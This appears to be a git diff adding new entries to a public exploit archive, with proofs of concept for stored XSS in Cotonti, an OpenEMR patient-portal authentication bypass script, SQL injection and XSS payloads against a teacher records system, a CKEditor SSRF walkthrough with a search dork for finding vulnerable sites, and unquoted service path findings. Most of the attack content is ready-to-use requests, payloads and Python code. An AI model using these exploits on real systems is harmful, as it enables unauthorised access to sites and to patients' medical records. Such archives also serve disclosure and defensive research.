diff --git a/exploits/php/webapps/50016.txt b/exploits/php/webapps/50016.txt new file mode 100644 index 000000000..07787ec95 --- /dev/null +++ b/exploits/php/webapps/50016.txt @@ -0,0 +1,77 @@ +# Exploit Title: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting +# Date: 2021-15-06 +# Exploit Author: Fatih İLGİN +# Vendor Homepage: cotonti.com +# Vulnerable Software: https://www.cotonti.com/download/siena_0919 +# Affected Version: 0.9.19 +# Tested on: Windows 10 + +# Vulnerable Parameter Type: POST +# Vulnerable Parameter: maintitle +# Attack Pattern: "> + +# Description + +1) Entering the Admin Panel (vulnerableapplication.com/cotonti/admin.php) +2) Then go to Configuration tab and set payload (">) for Site title param +3) Then click Update button +4) In the end, Go to home page then shown triggered vulnerability + + +# Proof of Concepts + +Request; + +POST /cotonti/admin.php?m=config&n=edit&o=core&p=title&a=update HTTP/1.1 +Host: vulnerableapplication.com +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 +Firefox/78.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 440 +Origin: https://vulnerableapplication.com +Connection: close +Referer: +https://vulnerableapplication/cotonti/admin.php?m=config&n=edit&o=core&p=title +Cookie: +__cmpconsentx19318=CPH17mBPH17mBAfUmBENBeCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; +__cmpcccx19318=aBPH17mCgAADAAXAA0AB4AQ4DiQKnAAA; +_ga=GA1.2.1498194981.1623770561; _gid=GA1.2.1196246770.1623770561; +__gads=ID=63f33aa9dd32c83c-220723d35ec800e9:T=1623770613:RT=1623770613:S=ALNI_MZ0ifDGVpIXuopc8JXvo208SRTYmA; +PHPSESSID=ahmanvhckp2o5g5rnpr4cnj9c3 + +&x=701dad27076b1d78&maintitle=%22%3E%3Cimg+src%3D1+href%3D1+onerror%3D%22javascript%3Aalert(1)%22%3E%3C%2Fimg%3E&subtitle=Subtitle&metakeywords=&title_users_details=%7BUSER%7D%3A+%7BNAME%7D&title_header=%7BSUBTITLE%7D+-+%7BMAINTITLE%7D&title_header_index=%7BMAINTITLE%7D+-+%7BDESCRIPTION%7D&subject_mail=%7BSITE_TITLE%7D+-+%7BMAIL_SUBJECT%7D&body_mail=%7BMAIL_BODY%7D%0D%0A%0D%0A%7BSITE_TITLE%7D+-+%7BSITE_URL%7D%0D%0A%7BSITE_DESCRIPTION%7D + + +Response; + +HTTP/1.1 200 OK +Date: Tue, 15 Jun 2021 16:07:59 GMT +Server: Apache +Expires: Mon, Apr 01 1974 00:00:00 GMT +Cache-Control: no-store,no-cache,must-revalidate, post-check=0,pre-check=0 +Pragma: no-cache +Last-Modified: Tue, 15 Jun 2021 04:07:59 GMT +Vary: Accept-Encoding +X-Robots-Tag: noindex,nofollow +Content-Length: 4366 +Connection: close +Content-Type: text/html; charset=UTF-8 + +

Administration panel / Configuration / Titles and Metas

+ +
+

Configuration

+
+

Done

+ +
\ No newline at end of file diff --git a/exploits/php/webapps/50017.py b/exploits/php/webapps/50017.py new file mode 100755 index 000000000..7c7a92456 --- /dev/null +++ b/exploits/php/webapps/50017.py @@ -0,0 +1,88 @@ +# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass +# Date 15.06.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://www.open-emr.org/ +# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip +# Version: All versions prior to 5.0.1.4 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2018-15152 +# CWE: CWE-287 +# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit + +''' +Description: +An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to +the registration page and modifying the requested url to access the desired page. Some +examples of pages in the portal directory that are accessible after browsing to the +registration page include: +- add_edit_event_user.php +- find_appt_popup_user.php +- get_allergies.php +- get_amendments.php +- get_lab_results.php +- get_medications.php +- get_patient_documents.php +- get_problems.php +- get_profile.php +- portal_payment.php +- messaging/messages.php +- messaging/secure_chat.php +- report/pat_ledger.php +- report/portal_custom_report.php +- report/portal_patient_report.php +Normally, access to these pages requires authentication as a patient. If a user were to visit +any of those pages unauthenticated, they would be redirected to the login page. +''' + + +''' +Import required modules: +''' +import requests +import argparse + + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--Openemrpath', type=str) +my_parser.add_argument('-R', '--PathToGet', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +openemr_path = args.Openemrpath +pathtoread = args.PathToGet + + +''' +Check for vulnerability: +''' +# Check, if Registration portal is enabled. If it is not, this exploit can not work +session = requests.Session() +check_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php' +check_vuln = session.get(check_vuln_url).text +print('') +print('[*] Checking vulnerability: ') +print('') + +if "Enter email address to receive registration." in check_vuln: + print('[+] Host Vulnerable. Proceeding exploit') +else: + print('[-] Host is not Vulnerable: Registration for patients is not enabled') + +''' +Exploit: +''' +header = { + 'Referer': check_vuln_url +} +exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread +Exploit = session.get(exploit_url, headers=header) +print('') +print('[+] Results: ') +print('') +print(Exploit.text) +print('') \ No newline at end of file diff --git a/exploits/php/webapps/50018.txt b/exploits/php/webapps/50018.txt new file mode 100644 index 000000000..f35120bfa --- /dev/null +++ b/exploits/php/webapps/50018.txt @@ -0,0 +1,38 @@ +# Exploit Title: Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated) +# Date: 05-10-2021 +# Exploit Author: nhattruong +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/ +# Version: 1.0 +# Tested on: Windows 10 + XAMPP v3.2.4 + +POC: +1. Go to url http://localhost/login.php +2. Login with default creds +3. Execute the payload + +Payload #1: + +POST /admin/search.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 32 +Origin: http://localhost +Connection: close +Referer: http://localhost/trms/admin/search.php +Cookie: PHPSESSID=4c4g8dedr7omt9kp1j7d6v6fg0 +Upgrade-Insecure-Requests: 1 + +searchdata=a' or 1=1-- -&search= + +Payload #2: + +http://local/admin/edit-subjects-detail.php?editid=a' or 1=1-- - + +Payload #3: + +http://local/admin/edit-teacher-detail.php?editid=a' or 1=1-- - \ No newline at end of file diff --git a/exploits/php/webapps/50019.txt b/exploits/php/webapps/50019.txt new file mode 100644 index 000000000..f72729726 --- /dev/null +++ b/exploits/php/webapps/50019.txt @@ -0,0 +1,31 @@ +# Exploit Title: Teachers Record Management System 1.0 – 'email' Stored Cross-site Scripting (XSS) +# Date: 05-10-2021 +# Exploit Author: nhattruong +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/ +# Version: 1.0 +# Tested on: Windows 10 + XAMPP v3.2.4 + +POC: +1. Go to url http://localhost/admin/index.php +2. Do login +3. Execute the payload +4. Reload page to see the different + +Payload: + +POST /admin/adminprofile.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 91 +Origin: http://localhost +Connection: close +Referer: http://localhost/trms/admin/adminprofile.php +Cookie: PHPSESSID=8vkht2tvbo774tsjke1t739i7l +Upgrade-Insecure-Requests: 1 + +adminname=Adminm&username=admin&mobilenumber=8979555556&email=">&submit= \ No newline at end of file diff --git a/exploits/php/webapps/50021.txt b/exploits/php/webapps/50021.txt new file mode 100644 index 000000000..f9298c2fa --- /dev/null +++ b/exploits/php/webapps/50021.txt @@ -0,0 +1,53 @@ +# Exploit Title: CKEditor 3 - Server-Side Request Forgery (SSRF) +# Google Dorks : inurl /editor/filemanager/connectors/uploadtest.html +# Date: 12-6-2021 +# Exploit Author: Blackangel +# Software Link: https://ckeditor.com/ +# Version:all version under 4 (1,2,3) +# Tested on: windows 7 + +Steps of Exploit:- + +1-using google dorks + +inurl /editor/filemanager/connectors/uploadtest.html + +2-after going to vulnerable page you will find filed “Custom Uploader URL: ” + +3-right click then choose inspect element, click on pick an element from +the page , select field Custom Uploader URL: + +4-in elements “” + +delete disabled=”” + +5-now you can put url start with any protocal + +6-send it to the server as you see website that you have entered link + +is appear into page . + +what this mean??!!1 + +you send request to server using vulnerable website + +you can said i used it as proxy + +hackers >>> vulnerable website >>> http:/xx.com + +so in http://xx.com logs requests come from vulnerable website + +impact:- + +1-that allows an attacker to induce the server-side application to make +HTTP requests to an arbitrary domain of the attacker’s choosing. if there +is big company use old version hackers can send request via there websites +and this not good for reputation of company + +2-put big company website in blacklist of websites cause i hackers can send +many of request via vulnerable website + +Mitigation:- + +Remove the uploadtest.html file as it is not used by the application. \ No newline at end of file diff --git a/exploits/windows/local/50012.txt b/exploits/windows/local/50012.txt new file mode 100644 index 000000000..ab312e198 --- /dev/null +++ b/exploits/windows/local/50012.txt @@ -0,0 +1,50 @@ +# Exploit Title: DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path +# Discovery by: Brian Rodriguez +# Date: 14-06-2021 +# Vendor Homepage: https://www.diskpulse.com +# Software Links: +# https://www.diskpulse.com/setups_x64/diskpulseent_setup_v13.6.14_x64.exe +# https://www.diskpulse.com/setups_x64/diskpulsesrv_setup_v13.6.14_x64.exe +# Tested Version: 13.6.14 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 10 Enterprise 64 bits + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" +|findstr /i /v "c:\windows\\" |findstr /i /v """ + +Disk Pulse Enterprise Disk Pulse Enterprise C:\Program Files\Disk Pulse +Enterprise\bin\diskpls.exe Auto +Disk Pulse Server Disk Pulse Server C:\Program Files\Disk Pulse +Server\bin\diskpls.exe Auto + +C:\Users\IEUser>sc qc "Disk Pulse Enterprise" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Disk Pulse Enterprise + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Pulse +Enterprise\bin\diskpls.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Disk Pulse Enterprise + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +C:\Users\IEUser>sc qc "Disk Pulse Server" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Disk Pulse Server + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Pulse +Server\bin\diskpls.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Disk Pulse Server + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50013.txt b/exploits/windows/local/50013.txt new file mode 100644 index 000000000..34921c8ed --- /dev/null +++ b/exploits/windows/local/50013.txt @@ -0,0 +1,31 @@ + # Exploit Title: Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path +# Discovery by: BRushiran +# Date: 15-06-2021 +# Vendor Homepage: https://www.disksorter.com +# Software Links: https://www.disksorter.com/setups_x64/disksortersrv_setup_v13.6.12_x64.exe +# Tested Version: 13.6.12 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 10 Enterprise 64 bits + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" +|findstr /i /v "c:\windows\\" |findstr /i /v """ + +Disk Sorter Server Disk Sorter Server C:\Program Files\Disk Sorter +Server\bin\disksrs.exe Auto + +C:\>sc qc "Disk Sorter Server" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Disk Sorter Server + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Sorter +Server\bin\disksrs.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Disk Sorter Server + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5574d20ec..11e0e5685 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11368,6 +11368,8 @@ id,file,description,date,author,type,platform,port 50009,exploits/windows/local/50009.txt,"SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows, 50010,exploits/windows/local/50010.txt,"Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows, 50011,exploits/linux/local/50011.sh,"Polkit 0.105-26 0.117-2 - Local Privilege Escalation",2021-06-15,"J Smith",local,linux, +50012,exploits/windows/local/50012.txt,"DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path",2021-06-16,"Brian Rodriguez",local,windows, +50013,exploits/windows/local/50013.txt,"Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path",2021-06-16,BRushiran,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -44165,3 +44167,8 @@ id,file,description,date,author,type,platform,port 49998,exploits/php/webapps/49998.py,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)",2021-06-14,"Ron Jost",webapps,php, 50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",2021-06-15,"BHAVESH KAUL",webapps,php, 50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64, +50016,exploits/php/webapps/50016.txt,"Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting",2021-06-16,"Fatih İLGİN",webapps,php, +50017,exploits/php/webapps/50017.py,"OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass",2021-06-16,"Ron Jost",webapps,php, +50018,exploits/php/webapps/50018.txt,"Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-06-16,nhattruong,webapps,php, +50019,exploits/php/webapps/50019.txt,"Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)",2021-06-16,nhattruong,webapps,php, +50021,exploits/php/webapps/50021.txt,"CKEditor 3 - Server-Side Request Forgery (SSRF)",2021-06-16,ahmed,webapps,php,